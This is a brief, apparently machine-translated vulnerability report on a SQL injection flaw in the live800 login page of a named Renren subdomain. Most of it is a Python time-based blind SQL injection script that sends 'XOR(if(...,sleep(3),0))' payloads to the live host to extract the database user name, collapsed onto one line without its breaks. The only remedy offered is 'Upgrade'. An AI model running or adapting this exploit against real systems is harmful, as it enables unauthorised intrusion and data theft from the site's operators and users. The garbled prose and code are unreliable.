Renren website has SQL injection vulnerability with verification script

Renren website has SQL injection vulnerability with verification script

Renren website SQL Injection Vulnerability

Recently, live800 seems to be very popular and wooyun searched for it .....

Http://live800.wan.renren.com/live800/loginAction.jsp? CompanyLoginName = 1 * & loginName = a111 & password = 111 live800 customer service system, which has been cracked by the Daniel

I found a lijiejie script. At the beginning, I never cracked down on the incomplete format exception ,,

After the script is completed, I feel very lucky. Haha, please visit the homepage.
 

 

 

import httplibimport timeimport stringimport sysimport randomimport urllibheaders = {}payloads = 'abcdefghijklmnopqrstuvwxyz0123456789@_.'print '[%s] Start to retrive MySQL User:' % time.strftime('%H:%M:%S', time.localtime())user = ''for i in range(1, 21):    for payload in payloads:        try:            s = "ascii(mid(lower(user()),%s,1))=%s" % (i, ord(payload))            s = "1'XOR(if(%s,sleep(3),0))OR'1" % s            conn = httplib.HTTPConnection('live800.wan.renren.com', timeout=3)            conn.request(method='GET',url="/live800/loginAction.jsp?companyLoginName=1%s&loginName=a111&password=111" % urllib.quote(s))            conn.getresponse()            conn.close()            print '.',        except Exception,e:            print e            user += payload            print '\n[in progress]', user,            time.sleep(3.0)            breakprint '\n[Done] MySQL user is %s' % user

 

 

 

 

Solution:

Upgrade